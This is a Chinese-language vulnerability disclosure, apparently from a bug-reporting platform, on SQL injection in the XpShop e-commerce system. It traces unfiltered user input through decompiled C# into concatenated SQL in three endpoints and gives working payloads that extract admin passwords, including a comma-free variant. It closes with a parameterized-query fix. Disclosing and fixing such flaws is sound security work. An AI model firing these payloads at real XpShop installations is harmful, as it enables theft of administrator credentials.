### 简要描述: 这是第二发 ### 详细说明: 漏洞位置:XpShop.WebUI.AutoComplete ``` protected void Page_Load(object sender, EventArgs e) { string input = this.GetInput(); if (input == "") { base.Response.Write(Utils.ShowMsg("非法调用!")); } else { base.Response.Write(this.GetProductName(input)); base.Response.End(); } } ``` 跟进这个函数GetProductName: ``` private string GetProductName(string pname) { ProductDB productDB = new ProductDB(); return productDB.GetProductNameByAjax(pname); } ``` 继续跟进GetProductNameByAjax: ``` public string GetProductNameByAjax(string productName) { string commandText = "SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%" + productName + "%' ORDER BY Sort DESC"; DataSet dataSet = XpShopDB.ExecuteDataset(XpShopDB.ConnectionString, CommandType.Text, commandText, null); return dataSet.GetXml(); } ``` 进库也是没过滤的,搜索型注入。 payload: post: pname=test%' union select password from admin-- 漏洞地址: namespace XpShop.WebUI.AJAX 代码: ``` private void BindActive() { if (base.Request.QueryString["parent_id"] != null) { this.BindChild(int.Parse(base.Request.QueryString["parent_id"])); } if (base.Request.QueryString["action"] != null && base.Request.QueryString["action"].ToString() == "del") { this.DeleteInstall(); } if (base.Request.QueryString["type"] != null) { string text = base.Request.QueryString["type"]; if (text != null) { if (<PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1 == null) { <PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1 = new Dictionary<string, int>(32) { { "GetResourceString", 0 }, { "GetShippings", 1 }, { "GetAddress", 2 }, { "GetAreaIDByName", 3 }, { "GetShippingName", 4 }, { "GetMemmberMaxAddressCount", 5 }, { "GetProductStatus", 6 }, { "GetPreNextProductID", 7 }, { "GetIsShopStop", 8 }, { "GetMemberFavCat", 9 }, { "AddToFav", 10 }, { "UserLoginStatus", 11 }, { "GetProductStatusByID", 12 }, { "AddStockReg", 13 }, { "CheckCoupons", 14 }, { "AddShoppingCartCoupons", 15 }, { 
"BindCoupons", 16 }, { "GetNowPrice", 17 }, { "DeleteFavPdt", 18 }, { "UpdatePayment", 19 }, { "AddNewFavCat", 20 }, { "EditFavCat", 21 }, { "DelFavCat", 22 }, { "GetCurrentMemberID", 23 }, { "GetCombineOrders", 24 }, { "GetSubArea", 25 }, { "GetStorage", 26 }, { "UpdateCartNum", 27 }, { "GetReceiveAddress", 28 }, { "ConfirmReceived", 29 }, { "ChangeScore", 30 }, { "CheckGiftStatus", 31 } }; } int num; if (<PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1.TryGetValue(text, out num)) { switch (num) { case 0: base.Response.Write(base.GetResourceString(base.Request.QueryString["str"])); base.Response.End(); goto IL_7CF; case 1: { string s = this.GetShippings(int.Parse(base.Request.QueryString["areaID"])); base.Response.Write(s); base.Response.End(); goto IL_7CF; } case 2: this.GetAddress(int.Parse(base.Request.QueryString["said"])); goto IL_7CF; case 3: this.GetAreaIDByName(base.Request.QueryString["AreaName"]);//第一处 goto IL_7CF; case 4: this.GetShippingName(base.Request.QueryString["ShippingID"]); goto IL_7CF; case 5: this.GetMemmberMaxAddressCount(); goto IL_7CF; case 6: this.GetProductStatus();//第二处 ``` 跟进第一处函数GetAreaIDByName: ``` private void GetAreaIDByName(string areaName) { base.Response.Write(new ShippingAreaDB().GetAreaIDByName(areaName)); base.Response.End(); } ``` 继续跟进函数GetAreaIDByName: ``` public string GetAreaIDByName(string areaName) { string result = "0"; string cmdText = "SELECT ShippingAreaID FROM ShippingArea WHERE [Name] = '" + areaName + "'";//进库 object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); if (obj != null) { result = obj.ToString(); } else { cmdText = "SELECT ShippingAreaID FROM ShippingArea WHERE [Name] LIKE '%" + areaName + "%'";//进库 object obj2 = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); if (obj2 != null) { result = obj2.ToString(); } } return result; } ``` 这两处都是进库,而且都是没有过滤的。 再来看看第二个函数GetProductStatus: ``` private 
void GetProductStatus() { string text = ""; string text2 = base.Request.QueryString["ProductNos"]; string[] array = text2.Split(new char[] { ',' }); ProductDB productDB = new ProductDB(); ConfigDetails systemConfig = new ConfigDB().GetSystemConfig(); for (int i = 0; i < array.Length; i++) { array[i] = array[i].Trim(); SqlDataReader productStatusByNo = productDB.GetProductStatusByNo(array[i]); ``` 继续跟进函数GetProductStatusByNo: ``` public SqlDataReader GetProductStatusByNo(string productNo) { string cmdText = string.Concat(new string[] { "SELECT Status,", Utils.dbo, "f_getstorage(productid) As Storage,IsForSale FROM Product WHERE ProductNo = '", productNo, "'" }); return XpShopDB.ExecuteReader(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } ``` 这里也是没有过滤的,但是有个问题: string[] array = text2.Split(new char[] { ',' }); 这里把传过来的值按逗号分割了,而且所使用的查询select了三个字段,三列的union select必须用逗号分隔,而逗号已经被拆掉,所以就没有办法用union注入了(反正我是没办法,大牛们就不知道了)然后遍历进库: SqlDataReader productStatusByNo = productDB.GetProductStatusByNo(array[i]); 于是我换了一个办法,不再使用逗号,给出两个payload: http://localhost/ajax.aspx?type=GetAreaIDByName&AreaName=test' union select password from admin-- http://localhost/ajax.aspx?type=GetProductStatus&ProductNos=test' and 1=(select top 1 password from admin)-- 修复建议: 以上几处都应改为参数化查询,把用户输入作为 SqlParameter 传给 ExecuteDataset/ExecuteScalar/ExecuteReader(目前这些调用的最后一个参数传的都是 null),而不是拼接进 SQL 字符串;Split/Trim 之类的处理并不能替代参数化。 ### 漏洞证明: http://**.**.**.**//AutoComplete.aspx pname=test%' union select password from admin-- [<img src="https://images.seebug.org/upload/201510/14172227397078b7f5dc910490bad264b3e461b8.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/14172227397078b7f5dc910490bad264b3e461b8.jpg) http://localhost/ajax.aspx?type=GetAreaIDByName&AreaName=test' union select password from admin-- [<img src="https://images.seebug.org/upload/201510/1416542256c81abde5caf88dbd768e812f76786f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1416542256c81abde5caf88dbd768e812f76786f.jpg) http://localhost/ajax.aspx?type=GetProductStatus&ProductNos=test' and 1=(select top 1 password 
from admin)-- [<img src="https://images.seebug.org/upload/201510/141654401fde1909f6fcb6b5461242d4ee1acef5.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/141654401fde1909f6fcb6b5461242d4ee1acef5.jpg)